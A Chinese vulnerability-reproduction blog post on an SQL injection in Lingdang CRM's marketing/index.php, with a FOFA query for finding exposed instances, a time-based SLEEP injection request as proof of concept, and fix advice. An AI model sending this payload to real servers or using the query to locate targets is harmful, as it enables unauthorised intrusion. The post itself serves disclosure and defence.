当前位置: 首页 > news >正文

灵当CRM index.php接口SQL注入漏洞复现 [附POC]

文章目录

  • 灵当CRM index.php接口SQL注入漏洞复现 [附POC]
    • 0x01 前言
    • 0x02 漏洞描述
    • 0x03 影响版本
    • 0x04 漏洞环境
    • 0x05 漏洞复现
      • 1.访问漏洞环境
      • 2.构造POC
      • 3.复现
    • 0x06 修复建议

灵当CRM index.php接口SQL注入漏洞复现 [附POC]

0x01 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

0x02 漏洞描述

灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系。灵当CRM marketing/index.php接口存在SQL注入漏洞。

0x03 影响版本

灵当CRM

0x04 漏洞环境

FOFA语法: body=“ldcrm.base.js” && icon_hash=“436310201”
在这里插入图片描述

0x05 漏洞复现

1.访问漏洞环境

在这里插入图片描述

2.构造POC

POC (GET)

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

3.复现

在这里插入图片描述

0x06 修复建议

建议关闭互联网暴露面或接口设置访问权限;升级至安全版本

相关文章:

  • [uni-app]小兔鲜-02项目首页
  • 菱形继承、菱形虚拟继承、菱形继承中多态问题、菱形虚拟继承中多态问题
  • 2024外研社综合能力大赛第一场真题
  • 【redis-02】深入理解redis中RBD和AOF的持久化
  • 数据科学基石:解析属性类型体系——从标称到比率,全面洞察数据分类机制
  • 快速开发拍卖平台,成品源码如何满足你的需求?
  • python测试开发---前后端交互Axios
  • Apache Iceberg构建高性能数据湖
  • 软件开发人员需要了解的知识
  • 代码随想录算法训练营第十四天|递归 226.翻转二叉树 101. 对称二叉树 104.二叉树的最大深度 111.二叉树的最小深度
  • vue3【实战】响应式主题(实时获取页面比例,指定尺寸内按比例缩放,超过指定尺寸保持高度不变的图片)
  • 云原生|浅谈云原生中的对象存储之MinIO 的使用
  • 回归预测 | Matlab基于SO-SVR蛇群算法优化支持向量机的数据多输入单输出回归预测
  • 【Linux】常用指令【更详细,带实操】
  • 数据结构编程实践20讲(Python版)—01数组
  • angular组件开发
  • centos安装java运行环境jdk+tomcat
  • C语言笔记(第一章:C语言编程)
  • HTTP那些事
  • JAVA之继承和多态
  • NLPIR语义挖掘平台推动行业大数据应用服务
  • opencv python Meanshift 和 Camshift
  • windows-nginx-https-本地配置
  • 精彩代码 vue.js
  • 微信小程序:实现悬浮返回和分享按钮
  • 小程序button引导用户授权
  • 学习HTTP相关知识笔记
  • 异步
  • python最赚钱的4个方向,你最心动的是哪个?
  • Semaphore
  • 不要一棍子打翻所有黑盒模型,其实可以让它们发挥作用 ...
  • ​14:00面试,14:06就出来了,问的问题有点变态。。。
  • ​RecSys 2022 | 面向人岗匹配的双向选择偏好建模
  • ​必胜客礼品卡回收多少钱,回收平台哪家好
  • # SpringBoot 如何让指定的Bean先加载
  • (1)(1.9) MSP (version 4.2)
  • (2)(2.10) LTM telemetry
  • (2024)docker-compose实战 (9)部署多项目环境(LAMP+react+vue+redis+mysql+nginx)
  • (6)添加vue-cookie
  • (附源码)springboot 智能停车场系统 毕业设计065415
  • (亲测有效)解决windows11无法使用1500000波特率的问题
  • (亲测有效)推荐2024最新的免费漫画软件app,无广告,聚合全网资源!
  • (心得)获取一个数二进制序列中所有的偶数位和奇数位, 分别输出二进制序列。
  • (转)es进行聚合操作时提示Fielddata is disabled on text fields by default
  • (转)jQuery 基础
  • (转贴)用VML开发工作流设计器 UCML.NET工作流管理系统
  • (转载)从 Java 代码到 Java 堆
  • (自用)网络编程
  • (总结)Linux下的暴力密码在线破解工具Hydra详解
  • .NET8 动态添加定时任务(CRON Expression, Whatever)
  • .NET企业级应用架构设计系列之结尾篇
  • .Net实现SCrypt Hash加密
  • .pyc文件还原.py文件_Python什么情况下会生成pyc文件?
  • :not(:first-child)和:not(:last-child)的用法
  • :如何用SQL脚本保存存储过程返回的结果集